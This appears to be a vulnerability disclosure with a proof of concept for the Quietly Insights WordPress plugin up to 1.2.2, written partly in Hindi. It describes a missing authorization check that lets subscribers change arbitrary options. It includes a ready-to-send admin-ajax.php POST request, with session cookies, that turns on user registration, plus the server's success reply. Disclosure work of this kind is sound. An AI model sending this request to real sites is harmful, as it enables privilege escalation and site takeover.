
Quietly Insights <= 1.2.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update
क्वाइटली इनसाइट्स <= 1.2.2 - प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं को मनमाने विकल्प अपडेट करने की अनुमति में कमी
वर्डप्रेस के लिए क्वाइटली इनसाइट्स प्लगइन, 1.2.2 तक और सहित सभी संस्करणों में एक फंक्शन पर क्षमता जांच (कैपेबिलिटी चेक) की कमी के कारण डेटा के अनधिकृत संशोधन के लिए असुरक्षित है, जो विशेषाधिकार वृद्धि (प्रिविलेज एस्केलेशन) का कारण बन सकता है। यह प्रमाणित हमलावरों, जिनके पास सब्सक्राइबर स्तर या उससे ऊपर की पहुंच है, के लिए वर्डप्रेस साइट पर मनमाने विकल्प (आर्बिट्ररी ऑप्शंस) अपडेट करना संभव बनाता है। इसका उपयोग पंजीकरण के लिए डिफ़ॉल्ट भूमिका को प्रशासक (एडमिनिस्ट्रेटर) में अपडेट करने और उपयोगकर्ता पंजीकरण सक्षम करने के लिए किया जा सकता है, ताकि हमलावर कमजोर साइट पर प्रशासनिक उपयोगकर्ता पहुंच प्राप्त कर सकें।
अपने कुकीज़ बदलें।
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
Cookie: wordpress_sec_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C31038bfa66d0777c50fba66263f613d288a20d1e14dfc0fc06903f77d1c9e41f; popup_time=2; alwaysStrip=1; _ga=GA1.2.1953252658.1732269795; _ga_16PD6PV48S=GS1.2.1732269795.1.0.1732270283.0.0.0; wp-settings-time-1=1734520301; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C987ff9134b881efe3cced2fa12593fd0ba5b2b02613fb93f48433b112015551a; PHPSESSID=49f0a4bfb294cad31ed4a83ede9bf485; tk_ai=zv7IX5yQT%2F6RzXuKQwqmMvEV; th_shop_mania_thms_time=1735227350366; tk_qs=
action=save_qap_id&option=users_can_register&new_value=1
{"option was":"users_can_register","value was":"1","success":true,"message":"Database updated successfully."}